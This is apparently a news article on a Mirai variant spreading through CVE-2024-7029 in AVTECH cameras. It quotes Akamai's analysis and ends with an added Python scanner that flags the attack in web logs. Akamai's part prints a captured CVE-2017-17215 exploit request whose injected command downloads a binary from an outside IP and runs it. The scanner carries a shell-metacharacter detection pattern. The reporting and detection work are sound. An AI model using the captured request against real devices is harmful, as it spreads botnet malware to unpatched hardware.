Unpatchable 0-day in surveillance camera is being exploited to install Mirai


Malicious hackers are exploiting a critical vulnerability in a widely used surveillance camera to spread Mirai, a family of malware that enlists infected IoT devices into large botnets, which are then used to launch attacks that bring down websites and other internet-connected devices.

The attacks target the AVM1203, a surveillance device made by Taiwanese manufacturer AVTECH, network security provider Akamai said on Wednesday. Unknown attackers have been exploiting a 5-year-old vulnerability since March. The zero-day vulnerability, known as CVE-2024-7029, is easy to exploit and allows attackers to execute malicious code. The AVM1203 is no longer sold or supported, so no update is available to fix the critical zero-day vulnerability.

Back then, a ragtag army shook the Internet

According to Akamai, attackers are exploiting the vulnerability to install a variant of Mirai. Mirai came to light in September 2016, when a botnet of infected devices took down the cybersecurity news site Krebs on Security. Mirai contained features that allowed a ragtag army of compromised webcams, routers, and other types of IoT devices to carry out distributed denial-of-service attacks of record-breaking scale. In the weeks that followed, the Mirai botnet carried out similar attacks on internet service providers and other targets. One such attack, on dynamic domain name provider Dyn, brought down large swathes of the internet. To complicate attempts to contain Mirai, its developers released the malware source code publicly. This allowed virtually anyone to create their own botnets capable of DDoS attacks of once-unimaginable scale.

Kyle Lefton, a security researcher with Akamai's Security Intelligence and Response Team, said in an email that the attacker behind the attacks has carried out DDoS attacks against “various organizations” that he declined to name or describe. So far, the team has seen no evidence that the attackers are monitoring video feeds or using the infected cameras for other purposes.

Akamai discovered the activity using a “honeypot” of devices that mimic cameras on the open internet to observe any attacks targeting them. This technique did not allow researchers to measure the size of the botnet. The U.S. Cybersecurity and Infrastructure Security Agency warned of the vulnerability earlier this month.

However, the technique has allowed Akamai to intercept the code used to compromise the devices. It targets a vulnerability that has been known since at least 2019, when the exploit code became public. The zero-day is located in the “brightness argument in the 'action=' parameter” and allows command injection, the researchers wrote. The zero-day, discovered by Akamai researcher Aline Eliovich, was only officially acknowledged this month with the publication of CVE-2024-7029.

Wednesday’s post continued:

How does it work?

This vulnerability was originally discovered while examining our honeypot logs. Figure 1 shows the decoded URL for clarity.
Fig. 1: Decoded payload body of the exploit attempts

The vulnerability lies in the brightness function within the file /cgi-bin/supervisor/Factory.cgi (Figure 2).

Fig. 2: PoC of the exploit

What could happen?

The exploitation of this vulnerability allows an attacker to execute remote code on a target system; in the exploit examples we observed, this is essentially what happened.

Figure 3 is an example of a threat actor exploiting this flaw to download and execute a JavaScript file to retrieve and load its main malware payload. Similar to many other botnets, this one also spreads a variant of the Mirai malware to its targets.

Fig. 3: Strings from the JavaScript downloader

In this case, the botnet is likely using the Corona Mirai variant, which other vendors had already referenced in 2020 in connection with the COVID-19 virus.

When executed, the malware connects to a large number of hosts via Telnet on ports 23, 2323, and 37215. It also prints the string “Corona” to the console on an infected host (Figure 4).

Fig. 4: Malware execution with output on the console

Static analysis of the strings in the malware samples shows that the path /ctrlt/DeviceUpgrade_1 is used as a target to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"

$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)

The botnet also targeted several other vulnerabilities, including Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. We have observed these vulnerabilities being exploited multiple times in the wild, and they continue to be successful.

Since this camera model is no longer supported, it is best for all users to replace it. As with all internet-connected devices, IoT devices should never be accessible using the default credentials provided.
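As an added example, not part of the Ars article or the Akamai post, the Python below scans constructed web-server log lines for the two request-level indicators the post names: requests to /cgi-bin/supervisor/Factory.cgi whose decoded query string carries shell metacharacters (the command-injection shape of CVE-2024-7029; the exact query layout is an assumption and the injected value is a labelled placeholder), and POST requests to /ctrlt/DeviceUpgrade_1 (the CVE-2017-17215 path the samples carry). Source addresses, timestamps and the log format are constructed; plain hits on Factory.cgi are reported at low severity because the device should not be reachable from the internet at all.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample log lines in common access-log format (not honeypot data
# from the post). The injected value is a placeholder, not a real payload.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2024:10:01:02 +0000] "GET /cgi-bin/supervisor/Factory.cgi?action=brightness&brightness=5 HTTP/1.1" 200 17
203.0.113.9 - - [12/Mar/2024:10:01:07 +0000] "GET /cgi-bin/supervisor/Factory.cgi?action=brightness&brightness=%24%28PLACEHOLDER_CMD%29 HTTP/1.1" 200 17
198.51.100.7 - - [12/Mar/2024:10:02:11 +0000] "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1" 401 0
198.51.100.8 - - [12/Mar/2024:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 512
"""

# Request line of a common-log-format entry: source, method, target, status.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Shell metacharacters that have no business inside a brightness value:
# command separators, pipes, backticks, embedded newlines and $( ... ).
SHELL_META_RE = re.compile(r'[;|`\n]|\$\(')

AVTECH_CGI = "/cgi-bin/supervisor/Factory.cgi"      # path named in the post
HUAWEI_UPGRADE = "/ctrlt/DeviceUpgrade_1"            # path named in the post


def classify_request(method, target):
    """Return (rule, cve, severity, action) for a request, or None if benign."""
    parts = urlsplit(target)
    if parts.path == AVTECH_CGI:
        # Decode the whole query so percent-encoded metacharacters are seen;
        # parse_qsl is only used to pull out the action= value for context.
        decoded = unquote(parts.query)
        action = dict(parse_qsl(parts.query, keep_blank_values=True)).get("action")
        if SHELL_META_RE.search(decoded):
            return ("avtech-cmd-injection", "CVE-2024-7029", "high", action)
        return ("avtech-factory-cgi-access", None, "low", action)
    if method == "POST" and parts.path == HUAWEI_UPGRADE:
        return ("huawei-deviceupgrade", "CVE-2017-17215", "high", None)
    return None


def scan_log(text):
    """Scan access-log text and return one finding dict per matching request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        hit = classify_request(m["method"], m["target"])
        if hit is None:
            continue
        rule, cve, severity, action = hit
        findings.append({
            "src": m["src"],
            "rule": rule,
            "cve": cve,
            "severity": severity,
            "action": action,
            "status": int(m["status"]),
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:<5} {f['src']:<14} {f['rule']:<27} {f['cve'] or '-'}")
```

The decoded-query check is deliberately applied to the whole query string rather than to individual parameter values, so an injected separator that would split a value during parsing still trips the rule; on a real deployment the same logic belongs in the honeypot or proxy log pipeline that fronts any such device.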
